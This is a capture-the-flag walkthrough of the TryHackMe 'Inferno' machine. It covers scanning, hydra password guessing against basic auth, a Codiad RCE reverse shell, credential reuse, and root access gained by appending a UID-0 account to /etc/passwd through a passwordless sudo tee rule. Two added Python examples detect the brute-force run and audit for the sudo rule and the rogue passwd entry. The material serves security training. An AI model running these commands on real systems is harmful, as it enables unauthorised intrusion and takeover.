Introduction
The Inferno room on TryHackMe is described as a “Real Life machine vs CTF. The machine is designed to be real-life and is perfect for newbies starting out in penetration testing”. The goal is to find two keys on the machine (user – local.txt and root – proof.txt).
Enumeration
After performing an nmap scan we find a lot of open ports on the target. But after investigating the ports the only ones that are running any services are port 22 and port 80.
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Dante's Inferno
When we take a look at the web page all we get is some text and an image.

Let's see what we can find out by using gobuster.
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.211.173/
[+] Threads: 40
[+] Wordlist: directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/02/13 13:47:05 Starting gobuster
===============================================================
/inferno (Status: 401)
/server-status (Status: 403)
===============================================================
2021/02/13 13:51:39 Finished
===============================================================
We found a directory called inferno, but it’s protected with basic auth.
Gaining access
We want to gain access to the protected directory inferno. But we don’t have any credentials or even usernames. We can create a short list of possible usernames to use with hydra.
root
admin
dante
inferno
Using those usernames and rockyou for the passwords we get a result when we try the username admin.
[80][http-get] host: 10.10.x.x login: admin password: <REDACTED>
[STATUS] attack finished for 10.10.x.x (valid pair found)
1 of 1 target successfully completed, 1 valid password found
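How this password-guessing run looks from the server side, as an added example that is not part of the original write-up: a detector that counts 401 responses per client and path in an Apache access log and records the user name of a later successful request. The log lines, IP addresses, threshold and window are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache common/combined log prefix: host ident user [time] "method path ..." status
LINE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')

def find_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Alert on clients with >= threshold 401s to one path inside `window`;
    record the user name of a later 2xx from the same client and path."""
    failures = defaultdict(deque)   # (ip, path) -> timestamps of recent 401s
    alerts = {}                     # (ip, path) -> alert record
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, user, ts, _method, path, status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        key = (ip, path)
        if status == "401":
            recent = failures[key]
            recent.append(when)
            while when - recent[0] > window:   # drop failures outside the window
                recent.popleft()
            if len(recent) >= threshold and key not in alerts:
                alerts[key] = {"ip": ip, "path": path, "guessed_user": None}
        elif status.startswith("2") and user != "-" and key in alerts:
            # Success after a burst of failures: treat the credential as guessed.
            alerts[key]["guessed_user"] = alerts[key]["guessed_user"] or user
    return list(alerts.values())

# Constructed sample log lines (documentation IP ranges, not from the write-up).
SAMPLE = [
    f'203.0.113.7 - admin [13/Feb/2021:14:02:{s:02d} +0000] "GET /inferno/ HTTP/1.1" 401 459'
    for s in range(6)
] + [
    '203.0.113.7 - admin [13/Feb/2021:14:02:07 +0000] "GET /inferno/ HTTP/1.1" 200 1021',
    # Ordinary browser login: one unauthenticated 401, then success.
    '198.51.100.20 - - [13/Feb/2021:14:03:00 +0000] "GET /inferno/ HTTP/1.1" 401 459',
    '198.51.100.20 - admin [13/Feb/2021:14:03:05 +0000] "GET /inferno/ HTTP/1.1" 200 1021',
]

if __name__ == "__main__":
    for alert in find_bruteforce(SAMPLE):
        print(alert)
```

Apache logs the supplied user name even on a 401, so that field is only trusted here on the 2xx line.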
Now we can log in to the protected path. Once past the basic auth prompt we get a login screen, and using the same credentials as for the basic auth we gain access to a web IDE.

After poking around a bit we discover that we don’t have permission to create or edit any files. We also find out that the web IDE is Codiad and that it’s no longer maintained. Using searchsploit we find two different vulnerabilities, but neither works on our target.
When we google for a Codiad exploit we find an RCE for the latest version of Codiad. Following the instructions and running the exploit against our target, we get a remote shell!
listening on [any] 4445 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.x.x] 42772
bash: cannot set terminal process group (934): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Inferno:/var/www/html/inferno/components/filemanager$ whoami
whoami
www-data
www-data@Inferno:/var/www/html/inferno/components/filemanager$
Gaining user access
Checking out the /home directory, we find the home directory for the user dante, and we have read permissions on it. After some digging around in the home directory we find a file called .download.dat in the Downloads directory. The content of the file is a hexdump, and when we decode the file we get the following.
«Or se’ tu quel Virgilio e quella fonte che spandi di parlar sì largo fiume?», rispuos’io lui con vergognosa fronte. «O de li altri poeti onore e lume, vagliami ’l lungo studio e ’l grande amore che m’ha fatto cercar lo tuo volume. Tu se’ lo mio maestro e ’l mio autore, tu se’ solo colui da cu’ io tolsi lo bello stilo che m’ha fatto onore. Vedi la bestia per cu’ io mi volsi; aiutami da lei, famoso saggio, ch’ella mi fa tremar le vene e i polsi».
dante:<REDACTED>
Looks like some credentials on the last line. Let's try them out.
ssh -l dante 10.10.x.x
dante@10.10.x.x's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-130-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
  System information as of Sat Feb 13 17:43:27 UTC 2021
  System load:  0.08              Processes:           605
  Usage of /:   42.3% of 8.79GB   Users logged in:     0
  Memory usage: 63%               IP address for eth0: 10.10.x.x
  Swap usage:   0%
39 packages can be updated.
0 updates are security updates.
Last login: Mon Jan 11 15:56:07 2021 from 192.168.1.109
dante@Inferno:~$
Awesome! Let's grab the user flag.
dante@Inferno:~$ cat local.txt
<FLAG>
Privilege escalation
Now it’s time to find a way to get root privileges. Let's check our sudo access.
dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User dante may run the following commands on Inferno:
    (root) NOPASSWD: /usr/bin/tee
So we have access to tee, which means we are able to write text to files as root. Let's try to add an entry to /etc/passwd with root privileges. First we need to create a password hash for our new user; we can do that by running openssl passwd -1 -salt pwn pwn, which gives us the hash $1$pwn$AxNbnbaujRUXRur/DewJ8/. Now we can use this to create a new entry.
dante@Inferno:~$ echo "pwn:\$1\$pwn\$AxNbnbaujRUXRur/DewJ8/:0:0:root:/root:/bin/bash" | sudo tee -a /etc/passwd
pwn:$1$pwn$AxNbnbaujRUXRur/DewJ8/:0:0:root:/root:/bin/bash
Let's find out if it works.
dante@Inferno:~$ su pwn
Password:
root@Inferno:/home/dante# cd /root
root@Inferno:~# ls -al
total 32
drwx------  5 root root 4096 Jan 11 15:45 .
drwxr-xr-x 24 root root 4096 Jan 11 14:57 ..
lrwxrwxrwx  1 root root    9 Jan 11 15:22 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwxr-x---  3 root root 4096 Jan 11 15:45 .config
drwxr-xr-x  3 root root 4096 Jan 11 15:30 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root   79 Jan 11 15:45 proof.txt
drwx------  2 root root 4096 Jan 11 15:19 .ssh
Great! Now let's grab the root flag.
root@Inferno:~# cat proof.txt
Congrats! You've rooted Inferno!
<FLAG>
mindsflee
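A defender-side audit for the two conditions the privilege escalation above relied on, as an added example that is not part of the original write-up: a passwordless sudo rule for a file-writing binary, and a resulting /etc/passwd entry with UID 0 and an inline hash. The FILE_WRITERS set and the dante passwd line are assumptions made for illustration; the sudo rule and the pwn entry are the ones shown in the write-up.

```python
import os

# Illustrative, not exhaustive: binaries that can write caller-chosen files.
FILE_WRITERS = {"tee", "cp", "dd", "mv", "install"}

def risky_sudo_rules(sudo_l_output):
    """Return (runas, command) pairs from `sudo -l` output that grant
    passwordless use of a file-writing binary."""
    hits = []
    for line in sudo_l_output.splitlines():
        line = line.strip()
        if not line.startswith("(") or "NOPASSWD:" not in line:
            continue
        runas, _, cmds = line.partition(" NOPASSWD:")
        for cmd in cmds.split(","):
            parts = cmd.split()
            if parts and os.path.basename(parts[0]) in FILE_WRITERS:
                hits.append((runas.strip("()"), parts[0]))
    return hits

def audit_passwd(text):
    """Flag extra UID 0 accounts and password fields that are not shadowed."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue                      # skip blank or malformed lines
        name, pw, uid = fields[:3]
        if uid == "0" and name != "root":
            findings.append((name, "uid0-not-root"))
        if pw not in ("x", "*", "!"):     # anything else is a hash or empty
            findings.append((name, "password-field-not-shadowed"))
    return findings

# `sudo -l` rule as shown in the write-up.
SUDO_L = ("User dante may run the following commands on Inferno:\n"
          "    (root) NOPASSWD: /usr/bin/tee\n")
# passwd content: the dante line is constructed; the pwn line is the appended entry.
PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
          "dante:x:1000:1000:dante:/home/dante:/bin/bash\n"
          "pwn:$1$pwn$AxNbnbaujRUXRur/DewJ8/:0:0:root:/root:/bin/bash\n")

if __name__ == "__main__":
    print(risky_sudo_rules(SUDO_L))
    print(audit_passwd(PASSWD))
```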